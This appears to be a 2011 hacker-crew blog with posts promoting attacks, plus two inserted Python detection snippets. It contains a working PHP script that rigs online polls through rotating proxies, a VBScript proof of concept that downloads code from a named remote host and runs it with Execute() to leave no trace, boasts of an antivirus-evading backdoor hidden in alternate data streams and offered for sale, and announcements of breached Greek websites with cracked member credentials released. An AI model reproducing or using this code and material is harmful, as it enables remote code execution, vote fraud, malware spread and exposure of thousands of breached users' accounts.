SAFI Tech

2p0wn

Got pwnd? | Pwn3rz Playground

Malware Analyzer v.3.3

Nov.02, 2011 in Apps, General

This is a really interesting program I accidentally found on my hard drive without knowing how it got there (?). Here is some main info about what it does:

String based analysis for registry, API calls, IRC Commands, DLL’s called and VMAware.

Display detailed headers of PE with all its section details, import and export symbols etc.

On distros, can perform an ASCII dump of the PE along with other options (check --help argument).

For Windows, it can generate various sections of a PE: DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections.
ASCII dump on Windows machine.

Code Analysis (disassembling)

Online malware checking (www.virustotal.com)

Check for Packer from the Database.

Tracer functionality: Can be used to identify Anti-debugging Calls tricks, File system manipulations Calls, Rootkit Hooks, Keyboard Hooks, DEP Setting Change, Network Identification traces.

Signature Creation: Allows creating a signature of malware.

Batch Mode Scan to Scan all DLL and Exe in directories and sub-directories

Pretty cool, huh? I checked sLicK v.04; here is what I got:

[+] Computing Checksum for malware :project1.exe

[-]Checksum of malware :439e8011d49c0d8c54e04c26e84dd95

[+] No malware detected

Flash Sucks (by Theodore)

Nov.02, 2011 in Articles, General

sLicK v.0.4 ADS

Aug.30, 2011 in Apps, General

 

Wassup everybody? I haven’t posted a lot lately due to holidays but I’m back with sLicK v.0.4 ADS edition (ads stands for Alternative Data Streams) [Works in Win vista/7 as well]. What changed is that the backdoor is dropped as a txt file and then put as an executable in an alternative data stream. That makes sLicK even more “slick” ;) .

Here is the AV scan from novirusthanks:

BOOJAJAJAJJAJ

soon available on the mark3tplac3

<3

So much shit to take care of…

Jul.30, 2011 in General

+

Why expose when we can use what we have??? Why deface? ;)

Soon..

Poll Ripper (by AnalyseR)

Jul.29, 2011 in Apps, General

<?php

echo “\r\nRipping polls for fun and profit\r\n\r\n\r\n\r\n”;

$proxia = file(“proxia.txt”);

for($i=0;$i<count($proxia);$i++){
$currprox = trim($proxia[$i]);
$currprox = str_replace(“\n”, “”, $currprox);
$currprox = str_replace(“\r”, “”, $currprox);

$skatoules = curl_init();
curl_setopt($skatoules, CURLOPT_URL,
‘http://yourpolltarget.com’);
curl_setopt($skatoules,
CURLOPT_POSTFIELDS,”myRequest=store_choice&userChoice=5″);
curl_setopt($skatoules, CURLOPT_POST, 1);
curl_setopt($skatoules, CURLOPT_HTTPHEADER, array(‘Content-Type:
application/x-www-form-urlencoded’));
curl_setopt($skatoules, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($skatoules, CURLOPT_PROXY, $currprox);
curl_setopt($skatoules, CURLOPT_HTTPPROXYTUNNEL, 1);
curl_setopt($skatoules, CURLOPT_REFERER,
‘http://yourpolltarget.com’);
curl_setopt($skatoules, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows NT
5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1′);

$page = curl_exec($skatoules);

$pos = strpos($page, “Thanks”);
if ($pos == false) {
echo $currprox. “\tFAIL\r\n”;
curl_close($skatoules);
} else {
echo $currprox. “\tSUCCESS\r\n”;
curl_close($skatoules);
}

}

echo “\r\n\r\n\r\n\r\nNetJammer:\tnetjammer05@gmail.com\r\n”;
echo “AnalyseR:\talienyser@gmail.com\r\n\r\n\r\n”;

?>
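Seen from the poll server, the script above yields one POST per proxy with an identical vote and User-Agent and no prior fetch of the poll page. The following detection check is an added example, not part of the original post; the tab-separated log layout, the `/poll` path, the thresholds and all sample records are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

UA = "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"
# Constructed vote log: time, client IP, method, path, userChoice, User-Agent.
SAMPLE_LOG = "\n".join([
    f"2011-07-29T10:00:01\t192.0.2.10\tPOST\t/poll\t5\t{UA}",
    f"2011-07-29T10:00:03\t198.51.100.7\tPOST\t/poll\t5\t{UA}",
    f"2011-07-29T10:00:04\t203.0.113.99\tPOST\t/poll\t5\t{UA}",
    "2011-07-29T10:00:30\t192.0.2.200\tGET\t/poll\t-\tOpera/9.80",
    "2011-07-29T10:00:41\t192.0.2.200\tPOST\t/poll\t2\tOpera/9.80",
])


def parse(line):
    ts, ip, method, path, choice, ua = line.split("\t")
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "method": method,
            "path": path, "choice": choice, "ua": ua}


def flag_vote_bursts(log_text, window=timedelta(minutes=5), min_ips=3):
    """Flag identical votes sent by many IPs that never loaded the poll page."""
    records = [parse(l) for l in log_text.splitlines() if l.strip()]
    fetched = {(r["ip"], r["path"]) for r in records if r["method"] == "GET"}
    groups = defaultdict(list)
    for r in records:
        if r["method"] == "POST" and (r["ip"], r["path"]) not in fetched:
            groups[(r["path"], r["choice"], r["ua"])].append(r)
    alerts = []
    for (path, choice, ua), votes in groups.items():
        votes.sort(key=lambda r: r["ts"])
        start, best = 0, set()
        for end, vote in enumerate(votes):
            # Shrink the window from the left until it spans at most `window`.
            while vote["ts"] - votes[start]["ts"] > window:
                start += 1
            ips = {v["ip"] for v in votes[start:end + 1]}
            if len(ips) > len(best):
                best = ips
        if len(best) >= min_ips:
            alerts.append({"path": path, "choice": choice, "user_agent": ua,
                           "ips": sorted(best)})
    return alerts
```

The browser that loaded the poll before voting is not flagged; only the group of three first-contact POSTs with the same choice and User-Agent is.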

[PoC] VBS Ghost-Scripting [Code execution from nowhere]

Jul.28, 2011 in Articles, General, Tuts

Hello people,

this is a Proof Of Concept Code in VBScript, that will allow you to execute ANYTHING, on ANY Windows box, without ANY trace of your -probably- malicious Script. I was looking for a method that would allow me to execute code in VBScript, without having the actual file dropped on the hard disk. Something like Process Injection anyway. That’s pretty impossible in VBScript, because of its structure. BUT. What if we could execute ANYTHING without the need to download our file locally? That’s possible, hell yeah it is! VBScript has a “command” called Execute(). I really can’t find a reason for this to exist but, it does. A sample of the Execute() command would be: Execute(msgbox “test”) (of course the result would be a msgbox). Yes, you’re right. With this method you have to include your code in the script, but what if you store it REMOTELY, then READ it without saving it ANYWHERE in the filesystem, and just execute the remote script instantly? Let’s take a look!

 

Create a .vbs file and call it “bdoor.vbs”. Paste the following lines of code in it…

getURL “hf”, “fh”, “http://2p0wn.pointlimit.com/bd.txt”
Sub getURL(hf,fh,url)
Set objHTTP = CreateObject(“MSXML2.XMLHTTP”)
Call objHTTP.Open(“GET”, url, False,hf,fh)
objHTTP.Send
Execute(objHTTP.ResponseText)
End Sub

 

Create a .txt file and code your actual malware. Name it “bd.txt” for example. Now, upload your bd.txt to your host and make sure it’s a direct link, and double click bdoor.vbs. Boom…! BD.TXT’s code is executed on your LOCAL computer, without leaving a single fucking trace of its existence!

Enjoy your 7-line ownage-script,

coded by AnalyseR & Prince_Pwn3r
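From the defender's side, the launcher script described in this post has a recognisable shape: an HTTP client COM object whose response is handed straight to Execute. The following static check for that shape is an added example, not code from the original post; the function name, the placeholder URL and the constructed sample are assumptions made for illustration, and it also covers the indirect case where the response is first copied into a variable.

```python
import re

# COM ProgIDs of HTTP clients that VBScript can instantiate.
HTTP_PROGIDS = ("msxml2.xmlhttp", "msxml2.serverxmlhttp",
                "microsoft.xmlhttp", "winhttp.winhttprequest")
# Dynamic-evaluation statements; the lookbehind skips methods such as conn.Execute.
SINK = re.compile(r"(?<![.\w])(executeglobal|execute|eval)\b\s*\(?\s*(.+)", re.I)
ASSIGN = re.compile(r"^\s*(?:set\s+)?(\w+)\s*=\s*(.+)$", re.I)
RESPONSE = re.compile(r"\.response(text|body)\b", re.I)

# Constructed sample: the launcher's structure with a placeholder URL.
SAMPLE_STUB = '''getURL "hf", "fh", "http://example.invalid/bd.txt"
Sub getURL(hf,fh,url)
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", url, False,hf,fh)
objHTTP.Send
Execute(objHTTP.ResponseText)
End Sub
'''


def find_remote_execute(source):
    """Return one finding per line where HTTP response data reaches a sink."""
    http_client_seen = False
    tainted = set()  # variables assigned (directly or transitively) from a response
    findings = []
    for line_no, raw in enumerate(source.splitlines(), 1):
        # Normalise typographic quotes that blog platforms substitute.
        line = raw.translate({0x201C: '"', 0x201D: '"'}).strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue  # blank line or comment
        low = line.lower()
        if "createobject" in low and any(p in low for p in HTTP_PROGIDS):
            http_client_seen = True
        sink = SINK.search(line)
        if sink:
            arg = sink.group(2)
            if RESPONSE.search(arg) or set(re.findall(r"\w+", arg.lower())) & tainted:
                findings.append({"line": line_no, "sink": sink.group(1).lower(),
                                 "http_client_seen": http_client_seen})
            continue
        assign = ASSIGN.match(line)
        if assign:
            rhs = assign.group(2)
            if RESPONSE.search(rhs) or set(re.findall(r"\w+", rhs.lower())) & tainted:
                tainted.add(assign.group(1).lower())
    return findings
```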

YEH OK WE GET IT

Jul.25, 2011 in General

THIS GOES TO ALL THE PEOPLE THAT HAVE AUTOMATICALLY DECLARED

THEMSELVES ANONYMOUS ETC. NOT THE REAL ANONYMOUS

 

WE GET IT, YOU ARE ALL GREAT ACTIVISTS HACKERS WITH SOME SHIT ASS MESSAGE TO CONVEY, WE GET IT YOU ARE A LEGION, WE GET IT YOU DON’T FORGET, BUT GIVE IT A FUCKING BREAK, GOVERNMENT SITES/SERVERS WERE/ARE/WILL BE HIT WITH OR WITHOUT SOME FUCKIN SIGN AND SOME SHIT ASS IDEOLOGY, NICE YOU MANAGED TO SCARE THAT LITTLE BOY THAT WAS WATCHING PORN ON HIS BROTHERS COMPUTER AND ACCIDENTALLY SAW YOUR PAGE ON FACEBOOK (YEH NICE ONE).. INDIVIDUALS HAVE ACCESSED/HACKED/HUMILIATED HUGE ORGANISATIONS/BANKS/ETC BEFORE THIS WHOLE ACTIVISM  CRAP AND WILL CONTINUE TO DO SO.. YOU AIN’T SCARING ANYBODY WITH YOUR MASKS. WE HAD PWND EVERYTHING THAT YOU ARE TRYING TO DEFACE FOR YOUR 10 MINUTE FAME.

 

[2p0wn3d] Qubo.gr

Jul.22, 2011 in General

 

AnalyseR and Prince_Pwn3r were there. You know how we get down.

13596 email accounts

922 user accounts

All at the 2p0wn repo —> here

Brap <3

[2p0wn3d] Zortal.gr – Ouch!

Jul.22, 2011 in Articles, General, mem0ries

 

Heya! Cheers from Prince_Pwn3r & AnalyseR!

We want to introduce you, our 19642 new friends!
Exactly! Zortal.gr got owned, and here is its member list!!!
We had some problems with the dump, cause their database is huge but… HERE THEY ARE BABE!

11212/19642 (about 57,1%) are already cracked by 2p0wn.
Try to crack the rest, we just got bored…

Msg to zortal.gr Admins: Sorry dudes, you own one of the oldest Greek portals, and you still don’t get what FUCKING SECURITY MEANS! Next time, just use clear-text passwords in your Database, to make it easier for us. Nerds.

Peace and love to “Anonymous” around the Globe, we’re with ya boys!

LOG FORMAT: Username:HASH:Password:eMail


Click Here To Get It!

Sharpmindprojects.com

Jul.21, 2011 in General

This website is made by a good friend of mine named JTG (JohnTheGr8), and it’s his personal page that deals with every project he is involved in. A little about the page:

 

My name’s John and I am a 17 year-old student from Athens, Greece. I started programming some years ago as a hobby, which I have retained until now. I mainly program in C#, and SharpMindProjects.com is the website where I publish the projects I am working on. These projects are mainly software, which are always open-source, but I might submit any other kind of work as well.

Check out the application FTPBox, which pwnz ass.. My love and respect to JTG <3

 
